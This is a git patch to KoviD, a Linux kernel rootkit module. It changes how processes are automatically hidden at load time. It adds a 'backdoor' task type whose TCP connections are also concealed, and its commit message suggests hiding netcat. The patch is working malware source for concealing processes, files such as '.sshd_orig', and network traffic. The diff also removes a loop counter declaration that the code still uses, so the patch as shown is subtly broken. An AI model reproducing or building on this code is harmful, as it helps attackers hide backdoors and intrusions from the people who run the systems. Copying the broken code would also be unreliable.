From 88b3be86b03849a0515b4be190583c537bac4382 Mon Sep 17 00:00:00 2001 From: JNE Date: Tue, 21 May 2024 10:39:12 -0700 Subject: [PATCH] Modify backdoor autohide o load On pid.c you can uncomment this, for example: //{"nc", KV_TASK_BD}, recompile + load nc + load kv check tcp connections with netstat --- src/kovid.c | 4 +++- src/lkm.h | 53 ++++++++++++++++++++++++++++++++++++++++++++--------- src/pid.c | 21 ++++----------------- 3 files changed, 51 insertions(+), 27 deletions(-) diff --git a/src/kovid.c b/src/kovid.c index ab8c915..a8b7416 100644 --- a/src/kovid.c +++ b/src/kovid.c @@ -741,9 +741,11 @@ static int __init kv_init(void) { fs_add_name_ro(kv_hide_str_on_load); /** hide magic filenames, directories and processes */ - fs_add_name_ro(kv_hide_ps_on_load); + fs_add_name_ro(kv_get_hide_ps_names()); + kv_scan_and_hide(); + #ifndef DEBUG_RING_BUFFER /** *pr_info because it must be shown even if DEPLOY=1 */ pr_info("Your module \'unhide\' magic word is: '%s'\n", magik); diff --git a/src/lkm.h b/src/lkm.h index c308057..dd24639 100644 --- a/src/lkm.h +++ b/src/lkm.h @@ -160,15 +160,6 @@ char *kv_util_random_AZ_string(size_t); /** VM operations */ unsigned long kv_get_elf_vm_start(pid_t); - /* - * Hide these process names during load - * children included - */ -static const char *kv_hide_ps_on_load[] = { - "whitenose", "pinknose", "rednose", "blacknose", - "greynose", "purplenose", "bluenose", NULL -}; - /* * Hide these names from write() fs output */ @@ -177,6 +168,50 @@ static const char *kv_hide_str_on_load[] = { ".lm.sh", ".sshd_orig", NULL }; +enum { + KV_TASK, + /* The following indicates a backdoor + * task that can also hide its + * tcp traffic + */ + KV_TASK_BD +}; + +struct _kv_hide_ps_on_load { + const char *name; + int type; +} ; + + /* + * Hide these process names at insmod + */ +static struct _kv_hide_ps_on_load kv_hide_ps_on_load[] = { + {"whitenose-example", KV_TASK}, + {"pinknose-example", KV_TASK}, + {"rednose-example", KV_TASK}, + {"blacknose-example", KV_TASK}, + {"greynose-example", KV_TASK}, + {"purplenose-example", KV_TASK}, + + // Uncomment, recompile and try nc: + //{"nc", KV_TASK_BD}, + + {NULL, -1}, +}; + +static inline const char **kv_get_hide_ps_names(void) { + static const char *names[256]; + int i; + if (!*names) { + size_t maxnames = sizeof(names) / sizeof(names[0]); + for (i = 0; kv_hide_ps_on_load[i].name != NULL + && i < maxnames; ++i) { + names[i] = kv_hide_ps_on_load[i].name; + } + } + return names; +} + // PP_NARG from // https://groups.google.com/forum/#!topic/comp.std.c/d-6Mj5Lko_s diff --git a/src/pid.c b/src/pid.c index 8fbb532..49ea4cb 100644 --- a/src/pid.c +++ b/src/pid.c @@ -458,28 +458,15 @@ void kv_scan_and_hide(void) { struct task_struct *t; for_each_process(t) { - short i = 0; - struct fs_file_node *fnode; if (kv_find_hidden_task(t)) continue; - if (!(fnode = fs_get_file_node(t))) continue; - - for (; kv_hide_ps_on_load[i] != NULL; ++i) { - if (strncmp(kv_hide_ps_on_load[i], t->comm, strlen(kv_hide_ps_on_load[i]))) continue; - prinfo("Hide task name '%s' from '%s' of pid %d\n", t->comm, fnode->filename, t->pid); - /** - * notice that any netapp added here - * will NOT be killed if kv is unloaded - * In reality an application that is listed in kv_hide_ps_on_load will be handled - * in the same way as if you manually hide a parent process: - * echo >/proc/kv - */ - kv_hide_task_by_pid(t->pid, 0 /* not a backdoor */, CHILDREN /* hide children */); + for (; kv_hide_ps_on_load[i].name != NULL; ++i) { + if (strncmp(kv_hide_ps_on_load[i].name, t->comm, strlen(kv_hide_ps_on_load[i].name))) continue; + prinfo("Hide task name '%s' of pid %d\n", t->comm, t->pid); + kv_hide_task_by_pid(t->pid, kv_hide_ps_on_load[i].type, CHILDREN); break; } - - kfree(fnode); } }